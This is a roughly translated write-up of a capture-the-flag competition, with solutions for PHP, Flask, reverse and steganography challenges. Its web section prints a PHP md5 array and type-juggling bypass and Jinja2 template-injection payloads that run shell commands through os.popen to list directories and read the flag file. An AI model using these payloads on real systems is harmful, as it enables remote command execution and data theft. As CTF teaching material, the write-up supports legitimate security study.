Original competition wp: Tencent documents

Spring cup

WEB

Topic 1 ： Sign in with a line of code

Source code ：

 <?php
// There is only one line of sign in 
echo !(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))?$flag:str_repeat(highlight_file(__FILE__), 0);

Knowledge point ：

intval Function properties ：intval() Function to get the integer value of a variable

md5 Array bypassing ：md5 Can't encrypt array , An error will be reported if the array is passed in , But it will continue to execute and the return result is null

Weak type comparison (==), Only judge whether the content is equal , If it is a string type , Then convert it into numerical type and judge

Ternary operator ：echo !()?xxx:yyy, if true Then use echo xxx, if false be echo yyy.

|| Connect the conditions

analysis

The whole condition

!(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))

Because the whole condition needs to be true to output flag, You can see that the brackets are prefixed with ！, You need the condition in brackets to be false

1.($_GET['BYE']==2021)==>BYE Not for 2021

2.!(intval($_GET['BYE'][0])==2021)==>BYE The integer value of is 2021

3.$_GET['HELLO']==$_GET['BYE']==>HELLO and BYE Variables cannot be equal

4.!(md5($_GET['HELLO'])==md5($_GET['BYE']))==> stay HELLO and BYE Add [], Become an array , namely null=null, Bypass

payload:

?HELLO[]=2021A&BYE[]=2021a

Topic two e4zy_flask

Hint:/admin?name=1 https://xz.aliyun.com/t/8029#toc-8

Enter the page

go to admin page

/admin

get Chuan Shen found that ssti

/admin?name=49

Look at the root directory

admin/?name={
   {%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

  Found to have flag

?flag={
   {%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20/flag%27).read()%20}}

 flag

flag{SST1_YoU_kNow_1t_A1way5_5O_Easy}

Topic three baby_SQL

Topic four TP_serialize

REVERSE

Topic 1 RE Check In

 IDA open flag.exe, Find out main There is a string in the function

BASE64 Decode to get flag

Topic two Easy RE

Topic three Dynamic Reverse

MISC

Topic 1 Enjoy the wonderful music

Unzip the file to get a wav Audio and a compressed package , The compressed package has a password , First watch the audio

Put it in Audacity see , Nothing

And then it turns out that sstv Turn picture , First switch the output device , And on again sstv Turn picture

Find the words on the picture “ I knocked CP It's the sweetest ！”, Is the compressed package password , Extract the audio

I found it was a song , Put it in Audacity see , Also nothing

It should be hidden files , Look for it ,DeepSound Find one in it txt

Open it and see a zero at the end , And there are a lot of columns , It should be zero width steganography

use Decrypt web address Decryption is flag

Topic two Super simple

With ps Splicing QR code , Scan out to get a string of characters

V20xNGFGb3pkSE5qTVRoNFpFWTVlbVJZUW14amJEbDZZVmN4ZDJKSFZTOW1VVDA5

Three times BASE64, obtain flag：flag{ls_1t_super_simple?}

Topic three Have a set meal

Unzip the file , Get one hint.txt And a compressed package with password

have a look hint.txt, It looks like a dictionary for bursting packets , try

The blast was successful , Decompress the package

Bacon code

Decrypt uppercase decompression error , Lower case decompression succeeded ,tiersxqxyhdcbsnervfy

decompression

Ook Decrypt

Unzip to get a picture

Put it in 010 Look inside

Look at attributes , Find out flag:flag{He110_everyone_1m#[email protected]_Amway}

Topic four Today is also a day to love ah Yao